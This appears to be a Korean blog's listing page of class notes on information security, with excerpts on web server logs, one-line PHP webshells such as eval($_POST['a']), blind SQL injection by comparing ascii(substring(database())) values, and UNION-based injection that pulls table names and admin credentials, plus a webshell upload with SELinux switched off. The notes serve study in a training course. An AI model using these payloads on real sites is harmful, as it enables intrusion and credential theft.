본문 바로가기

전체 글223

정보보안8 12-13차시 ErrorLog 웹 서버의 오류 로그 파일 설정 /etc/httpd/logs/파일명 CustomLog 웹 서버에 접근하는 로그 파일 설정 /etc/httpd/logs/파일명 메인서버 -  가상호스트 -  한 줄 웹쉘system("명령어"); eval("echo '123';"); elval("system('pwd')"); # grep eval\( /var/www/html/* grep: /var/www/html/data: 디렉터리입니다 grep: /var/www/html/iframe: 디렉터리입니다 grep: /var/www/html/images: 디렉터리입니다 /var/www/html/list.html:     */@eval($_POST['a']); /var/www/html/list.html:       .. 2024. 12. 22.
정보보안8 11차시 대소문자, 숫자, _를 이용해서 DB명을 만들 수 있다. 이때문에 db명을 알아낼 때 ord('a'), ord('z')+1의 범위만으로는 부족하다 데이타의 값 알아내기for i in range(ord('0'), ord('z')+1):for문 돌리고ascii(substring(database(),{count},1)) = {i}#아스키코드로 database()를 substring으로 잘라 하나씩 비교한다 이 때 대소문자,숫자,특문 구분은if (i not in range(ord('0'), ord('9')) and             i not in range(ord('a'), ord('z')) and             i not in range(ord('A'), ord('Z')) and          .. 2024. 12. 15.
정보보안8 9-10차시 요약 토요일 집회에 나가느라 학원 9차시에 불참했는데,다음날까지 앓아누워서 10차시까지 불참했다... 때문에 교안을 보고 필요한 부분만 요약하여 기록함 -php를 통한 공격 및 크롤링import requests import bs4 url = "대상" res = requests.get(url) soup = bs4.BeautifulSoup(res.text, 'html.parser') ret_value = soup.find('태그') ex) 'b' 태그등이 있으면 에러, 없으면 정상 등 구분할 기준 필요 bs4 HTML 및 XML 문서를 구문 분석하여 데이터를 쉽게 추출할 수 있도록 도와주는 라이브러리 통신기능은 없고 크롤링 작업에 주로 사용됨 re 정규표현식을 사용해 문자열에서 특정 패턴을 검색, 추출, 치환하는.. 2024. 12. 15.
정보보안8 8차시 ?id=bbs1 union SELECT 1,table_name,3,column_name,5,6,7,8 FROM information_schema.COLUMNS WHERE table_name = 'member' and  table_schema='mywebsite'&m=list=> union을 이용하여 테이블 이름, 컬럼 이름 등을 테이블이 member이고 데이터베이스가 mywebsite인 데이터에서 얻는다. 관리자 비밀번호 추출하기?id=bbs1 union SELECT 1,userid,3,userpass,5,6,7,8 FROM member&m=list위에서 나온 userid, userpass를 사용하여 출력 sql injection을 이용한 웹쉘 업로드 setenforce 0=> selinux off 테스.. 2024. 12. 1.